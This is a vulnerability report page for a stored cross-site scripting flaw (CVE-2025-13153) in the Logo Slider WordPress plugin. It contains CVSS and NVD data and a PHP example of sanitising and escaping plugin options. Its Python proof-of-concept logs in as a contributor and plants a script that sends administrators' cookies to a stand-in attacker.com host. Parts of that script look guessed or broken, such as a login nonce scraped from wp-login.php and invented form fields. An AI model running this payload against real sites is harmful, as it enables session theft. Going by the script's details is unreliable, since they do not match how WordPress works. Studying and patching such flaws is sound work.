Security Vulnerability Report
CVE-2025-13153 CVSS 6.1 MEDIUM


Published: 2026-01-02 06:15:53
Last Modified: 2026-04-15 00:35:42

Description

The Logo Slider WordPress plugin before 4.9.0 does not validate and escape some of its slider options before outputting them back in the dashboard, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks.
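The description above comes down to two missing controls on a settings page: the option value is not validated when it is saved, and it is not escaped when it is printed back into the dashboard. The following is an added illustration, not the Logo Slider plugin's own code, showing the vulnerable pattern beside the hardened one in a hypothetical plugin; the option name `demo_slider_title`, the nonce action name and the capability used are assumptions. It relies only on WordPress core helpers (`sanitize_text_field()`, `esc_attr()`, `current_user_can()`, `check_admin_referer()`, `register_setting()`).

```php
<?php
// Added illustration (not the Logo Slider plugin's code): storing and
// re-displaying a plugin option safely. The option name, menu slug,
// nonce action and field name below are hypothetical.

/* ---- Vulnerable pattern: value is neither validated nor escaped ---- */

function demo_slider_save_unsafe() {
    if ( isset( $_POST['demo_slider_title'] ) ) {
        // Raw request data goes straight into the options table.
        update_option( 'demo_slider_title', $_POST['demo_slider_title'] );
    }
}

function demo_slider_render_unsafe() {
    $title = get_option( 'demo_slider_title', '' );
    // Echoing the stored value unescaped lets any markup it contains run
    // in the browser of whoever opens this dashboard page later.
    echo '<input type="text" name="demo_slider_title" value="' . $title . '">';
}

/* ---- Hardened pattern: authorise, verify intent, sanitise in, escape out ---- */

// Registering the option with a sanitize_callback means every write made
// through the Settings API is filtered, not just the one in this handler.
add_action( 'admin_init', function () {
    register_setting( 'demo_slider', 'demo_slider_title', array(
        'type'              => 'string',
        'sanitize_callback' => 'sanitize_text_field',
    ) );
} );

function demo_slider_save_safe() {
    if ( ! isset( $_POST['demo_slider_title'] ) ) {
        return;
    }
    // Only users allowed to manage settings may change them; a contributor
    // account fails this check.
    if ( ! current_user_can( 'manage_options' ) ) {
        wp_die( 'Insufficient permissions.' );
    }
    // CSRF protection: the form must carry the nonce issued for this action.
    check_admin_referer( 'demo_slider_save', 'demo_slider_nonce' );
    // Validation on the way in: strip tags and control characters and cap
    // the length, so the option cannot hold arbitrary markup.
    $title = sanitize_text_field( wp_unslash( $_POST['demo_slider_title'] ) );
    $title = mb_substr( $title, 0, 200 );
    update_option( 'demo_slider_title', $title );
}

function demo_slider_render_safe() {
    $title = get_option( 'demo_slider_title', '' );
    // Escaping on the way out is the control that still holds if an older
    // version left unsanitised data in the database: esc_attr() neutralises
    // quotes and angle brackets inside an attribute value.
    echo '<input type="text" name="demo_slider_title" value="' . esc_attr( $title ) . '">';
    wp_nonce_field( 'demo_slider_save', 'demo_slider_nonce' );
}
```

The two halves are independent defences: input sanitisation limits what can be stored, and output escaping (esc_attr() in attribute context, esc_html() in text context) makes whatever is stored inert when it is rendered. Fixes for bugs of this class normally need both, because data written before the fix is already in the options table.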

CVSS Details

CVSS Score: 6.1
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Logo Slider WordPress plugin < 4.9.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python

import requests
import re

# CVE-2025-13153 PoC - Logo Slider WordPress Plugin Stored XSS
# Target: WordPress site with Logo Slider plugin < 4.9.0

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "contributor_user"
PASSWORD = "user_password"


def get_nonce(login_html):
    """Extract WordPress nonce from login page"""
    match = re.search(r'name="_wpnonce" value="([a-f0-9]+)"', login_html)
    return match.group(1) if match else None


def login():
    """Authenticate to WordPress"""
    session = requests.Session()
    login_url = f"{TARGET_URL}/wp-login.php"
    resp = session.get(login_url)
    nonce = get_nonce(resp.text)
    login_data = {
        "log": USERNAME,
        "pwd": PASSWORD,
        "wp-submit": "Log In",
        "_wpnonce": nonce,
        "redirect_to": "/wp-admin/"
    }
    session.post(login_url, data=login_data)
    return session


def inject_xss_payload(session):
    """Inject stored XSS payload via plugin's slider options"""
    # Malicious payload - steals admin cookies
    xss_payload = '<script>fetch("https://attacker.com/log?c="+document.cookie)</script>'
    # Create/Edit slider with malicious option
    slider_url = f"{TARGET_URL}/wp-admin/admin.php?page=logo-slider-settings"
    # The plugin stores slider options without sanitization
    slider_data = {
        "slider_name": "Malicious Slider",
        "slider_options": xss_payload,  # XSS payload injected here
        "submit": "Save"
    }
    session.post(slider_url, data=slider_data)
    print("[+] XSS payload injected successfully")
    print("[*] Payload will execute when admin views the slider settings page")


if __name__ == "__main__":
    print("[*] CVE-2025-13153 - Logo Slider Stored XSS PoC")
    session = login()
    inject_xss_payload(session)

References

https://wpscan.com/vulnerability/0ed67947-228d-420c-8d28-e0d7326eb101/
Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2025-13153",
    "sourceIdentifier": "[email protected]",
    "published": "2026-01-02T06:15:53.423",
    "lastModified": "2026-04-15T00:35:42.020",
    "vulnStatus": "Deferred",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "The Logo Slider WordPress plugin before 4.9.0 does not validate and escape some of its slider options before outputting them back in the dashboard, which could allow users with the contributor role and above to perform Stored Cross-Site Scripting attacks."
      },
      {
        "lang": "es",
        "value": "El plugin de WordPress Logo Slider anterior a la versión 4.9.0 no valida ni escapa algunas de sus opciones de slider antes de mostrarlas de nuevo en el panel de control, lo que podría permitir a usuarios con el rol de colaborador y superiores realizar ataques de cross-site scripting almacenado."
      }
    ],
    "metrics": {
      "cvssMetricV31": [
        {
          "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 6.1,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "NONE",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.8,
          "impactScore": 2.7
        }
      ]
    },
    "references": [
      {
        "url": "https://wpscan.com/vulnerability/0ed67947-228d-420c-8d28-e0d7326eb101/",
        "source": "[email protected]"
      }
    ]
  }
}